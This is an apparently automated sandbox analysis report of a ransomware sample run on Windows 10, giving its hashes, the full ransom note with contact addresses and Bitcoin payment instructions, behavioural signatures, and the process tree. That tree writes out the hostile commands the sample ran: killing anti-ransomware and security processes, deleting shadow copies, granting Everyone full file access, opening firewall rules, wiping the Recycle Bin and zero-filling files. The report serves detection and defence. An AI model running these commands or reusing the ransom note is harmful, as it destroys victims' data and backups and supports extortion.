Overview

overview

10

Static

static

HEUR-Troja...fc.exe

windows7-x64

10

HEUR-Troja...fc.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    113s
  • max time network
    166s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/09/2022, 09:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    HEUR-Trojan-Ransom.MSIL.Encoder.gen-5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe

  • Size

    100KB

  • MD5

    7fdd3bf8886199e8336f95c88bcaa49a

  • SHA1

    77e2019093379de4d5de07dbcf5893831c9bb7ec

  • SHA256

    5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc

  • SHA512

    9d774eca21fb33f26991cf20f0f6a2f0bce56aa4cc3d17fd769e0bb767ca400cd5c8dd64bb62db23bf5bc112b91b1a26db7bf2f9d85993cb990be5113e527a40

  • SSDEEP

    1536:1zmSA404oATJVPHEMXMxa6CO3/k/hdXVyczH+95DfFFjfuEnm:1zxEYsZaLhdlo95DfFFjfuCm

Score
10/10
discoveryevasionpersistenceransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Ransom Note
All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail [email protected] or: [email protected] (Backup mail) Send us this file RESTORE_FILES_INFO ================================================================================================================= Free decryption as a guarantee Before paying, you can send 1-2 files for free decryption. File format: txt doc pdf jpeg jpg gif png bmp Total file size should not exceed 2 MB (without archive) ====================================================== You can buy Bitcoins here: https://localbitcoins.com Or use the search how to buy Bitcoins in your country ================================================================================================================= IMPORTANT!!! Remember that your files are encrypted and only WE can recover them! Do not try to recover yourself, as well as on third-party resources, you will lose your files and money forever! ================================================================================================================= Key Identifier: AFJ9Rf6QPU8eUI//ONFJSZQs0rF5POLCQZK3FOdCCoZybsr1VA5c7NzesWftkrFAvUKUlmde21ip45qMqR7yBBkucWdYv5TE3q9pWVcZxaZUyYdj2F4PuhzvIvvL7hJeRX9UE4MNbZ4suHhIhaA93YqE/QVLSwuiZORhxAgLGyMTc+j3lL9gHSDpz2+XuVA5PkwSnMOFWG4dAlL2q/sfXHmp/u0EZxD3VUOUeehIb8W2fbGsrrlGYRUXtDIMpqDYir43ADH7JiAUXo7bwK6Q5mToKmdHEQTLAPOG85smvbi8cvSFvWSuGKasAdM+h++UWREI4OIKoGa+vTbywU2J8zdosaFInCc14qeAtHS6HegxSeG9Jk1tXLYrw/yNdw9xHJnnm56yC31N+/FekSX/AuxOLzxeWVVpSPhcExQ3DmtyMUrpcew9X21wKDZBfR9u7cw7gwGmWkukUue801JP+1ronWnVj397KStK6z8OeLJqUbrCgw9s8wDkQDcF9FPg3oVed08jKkZP28pGs9UbVXQ7+6vbCTeNPS/ZsEOrqEqQUUZDBkgSXU1G+unvKVXyJu+ASxN9gezGEQHwA+tNhjbe/Jaoay/uypiCHDhM3zs3X6OPessss1fltLxTIzHPZXp5L/zuAZzHCk4C+inghsjJf0y3VtZKjJT6SRifptc= PC Hardware ID: 2C4BFA22

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

Ransom Note
All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail [email protected] or: [email protected] (Backup mail) Send us this file RESTORE_FILES_INFO ================================================================================================================= Free decryption as a guarantee Before paying, you can send 1-2 files for free decryption. File format: txt doc pdf jpeg jpg gif png bmp Total file size should not exceed 2 MB (without archive) ====================================================== You can buy Bitcoins here: https://localbitcoins.com Or use the search how to buy Bitcoins in your country ================================================================================================================= IMPORTANT!!! Remember that your files are encrypted and only WE can recover them! Do not try to recover yourself, as well as on third-party resources, you will lose your files and money forever! ================================================================================================================= Key Identifier: AFJ9Rf6QPU8eUI//ONFJSZQs0rF5POLCQZK3FOdCCoZybsr1VA5c7NzesWftkrFAvUKUlmde21ip45qMqR7yBBkucWdYv5TE3q9pWVcZxaZUyYdj2F4PuhzvIvvL7hJeRX9UE4MNbZ4suHhIhaA93YqE/QVLSwuiZORhxAgLGyMTc+j3lL9gHSDpz2+XuVA5PkwSnMOFWG4dAlL2q/sfXHmp/u0EZxD3VUOUeehIb8W2fbGsrrlGYRUXtDIMpqDYir43ADH7JiAUXo7bwK6Q5mToKmdHEQTLAPOG85smvbi8cvSFvWSuGKasAdM+h++UWREI4OIKoGa+vTbywU2J8zdosaFInCc14qeAtHS6HegxSeG9Jk1tXLYrw/yNdw9xHJnnm56yC31N+/FekSX/AuxOLzxeWVVpSPhcExQ3DmtyMUrpcew9X21wKDZBfR9u7cw7gwGmWkukUue801JP+1ronWnVj397KStK6z8OeLJqUbrCgw9s8wDkQDcF9FPg3oVed08jKkZP28pGs9UbVXQ7+6vbCTeNPS/ZsEOrqEqQUUZDBkgSXU1G+unvKVXyJu+ASxN9gezGEQHwA+tNhjbe/Jaoay/uypiCHDhM3zs3X6OPessss1fltLxTIzHPZXp5L/zuAZzHCk4C+inghsjJf0y3VtZKjJT6SRifptc= Number of files that were processed is: 1067 PC Hardware ID: 2C4BFA22

Signatures

  • Modifies Windows Firewall 1 TTPs 4 IoCs
    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Modifies file permissions 1 TTPs 3 IoCs
    discovery
  • Modifies WinLogon 2 TTPs 2 IoCs
    persistence
  • Drops file in Program Files directory 12 IoCs
  • Drops file in Windows directory 10 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 48 IoCs
    evasion
  • Modifies registry key 1 TTPs 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Encoder.gen-5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe
    "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Encoder.gen-5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Modifies WinLogon
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:5080
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2120
    • C:\Windows\SYSTEM32\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:308
      • C:\Windows\SYSTEM32\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:4436
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:3628
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config FDResPub start= auto
          2⤵
          • Launches sc.exe
          PID:1772
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config Dnscache start= auto
          2⤵
          • Launches sc.exe
          PID:4864
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config SQLTELEMETRY start= disabled
          2⤵
          • Launches sc.exe
          PID:4536
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config SSDPSRV start= auto
          2⤵
          • Launches sc.exe
          PID:4372
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
          2⤵
          • Launches sc.exe
          PID:680
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config SstpSvc start= disabled
          2⤵
          • Launches sc.exe
          PID:752
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config upnphost start= auto
          2⤵
          • Launches sc.exe
          PID:1592
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config SQLWriter start= disabled
          2⤵
          • Launches sc.exe
          PID:2704
        • C:\Windows\SYSTEM32\netsh.exe
          "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
          2⤵
          • Modifies Windows Firewall
          PID:3040
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mspub.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:400
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM synctime.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1556
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mspub.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4960
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mydesktopqos.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3332
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mysqld.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3796
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM Ntrtscan.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2248
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM sqbcoreservice.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1248
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mydesktopservice.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4452
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM isqlplussvc.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1456
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM firefoxconfig.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2236
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM onenote.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:540
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM tbirdconfig.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1896
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM encsvc.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2216
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM agntsvc.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2744
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM PccNTMon.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1644
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM excel.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4672
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM dbeng50.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4036
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM thebat.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:220
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM thebat64.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3960
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM CNTAoSMgr.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:664
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM msaccess.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3640
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM outlook.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4968
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM sqlwriter.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4504
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM steam.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3720
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM ocomm.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3644
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM tmlisten.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4048
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" IM thunderbird.exe /F
          2⤵
          • Kills process with taskkill
          PID:4892
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM wordpad.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3356
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM infopath.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:892
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM dbsnmp.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2060
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mysqld-opt.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1444
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM msftesql.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:704
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mbamtray.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2124
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM xfssvccon.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2956
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM powerpnt.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4360
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM ocautoupds.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:5084
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM zoolz.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4588
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mydesktopqos.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1496
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM ocssd.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1556
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM visio.exe /F
          2⤵
          • Kills process with taskkill
          PID:3484
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM oracle.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:216
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mydesktopservice.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2416
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM sqlagent.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4032
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM winword.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3684
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM sqlbrowser.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3864
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mysqld-nt.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3612
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM sqlservr.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3368
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3676
        • C:\Windows\SYSTEM32\icacls.exe
          "icacls" "C:*" /grant Everyone:F /T /C /Q
          2⤵
          • Modifies file permissions
          PID:1640
        • C:\Windows\SYSTEM32\icacls.exe
          "icacls" "D:*" /grant Everyone:F /T /C /Q
          2⤵
          • Modifies file permissions
          PID:2392
        • C:\Windows\SYSTEM32\icacls.exe
          "icacls" "Z:*" /grant Everyone:F /T /C /Q
          2⤵
          • Modifies file permissions
          PID:1964
        • C:\Windows\SYSTEM32\netsh.exe
          "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
          2⤵
          • Modifies Windows Firewall
          PID:1536
        • C:\Windows\SYSTEM32\arp.exe
          "arp" -a
          2⤵
            PID:3248
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
            2⤵
              PID:1000
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c rd /s /q D:\\$Recycle.bin
              2⤵
                PID:1324
              • C:\Windows\SYSTEM32\netsh.exe
                "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                2⤵
                • Modifies Windows Firewall
                PID:3412
              • C:\Windows\SYSTEM32\netsh.exe
                "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
                2⤵
                • Modifies Windows Firewall
                PID:3128
              • C:\Windows\System32\notepad.exe
                "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
                2⤵
                • Opens file in notepad (likely ransom note)
                PID:4984
              • C:\Windows\SYSTEM32\cmd.exe
                "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                2⤵
                  PID:3936
                  • C:\Windows\system32\PING.EXE
                    ping 127.0.0.7 -n 3
                    3⤵
                    • Runs ping.exe
                    PID:1180
                  • C:\Windows\system32\fsutil.exe
                    fsutil file setZeroData offset=0 length=524288 “%s”
                    3⤵
                      PID:4032
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Encoder.gen-5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe
                    2⤵
                      PID:2392
                      • C:\Windows\system32\choice.exe
                        choice /C Y /N /D Y /T 3
                        3⤵
                          PID:4612

                    Network

                    MITRE ATT&CK Enterprise v6

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
                      Filesize

                      1KB

                      MD5

                      f3dc4193bab2599f08b987d977d37c1f

                      SHA1

                      75b9843e0a47f8c6e9c9f1993cf0673d5d5b9222

                      SHA256

                      841b5221834f6aa5f5e37625da413af2d603adf51d6fca8e724b0ca630831e67

                      SHA512

                      f016c226181fed76e76c4c845e5d2bd2e4b68db41385ca2d3cff215928ea6c6f7575051df7b1a9c15aabc168389925b10e617c919cab8cd2d31347e979510b6d

                      Download Submit

                    • memory/3676-200-0x00007FFBA9C30000-0x00007FFBAA6F1000-memory.dmp

                      Filesize

                      10.8MB

                      Download

                    • memory/3676-199-0x0000027774CE0000-0x0000027774D02000-memory.dmp

                      Filesize

                      136KB

                      Download

                    • memory/5080-134-0x00007FFBA9C30000-0x00007FFBAA6F1000-memory.dmp

                      Filesize

                      10.8MB

                      Download

                    • memory/5080-132-0x0000000000580000-0x00000000005A0000-memory.dmp

                      Filesize

                      128KB

                      Download

                    • memory/5080-133-0x00007FFBA9C30000-0x00007FFBAA6F1000-memory.dmp

                      Filesize

                      10.8MB

                      Download

                    • memory/5080-202-0x00007FFBA9C30000-0x00007FFBAA6F1000-memory.dmp

                      Filesize

                      10.8MB

                      Download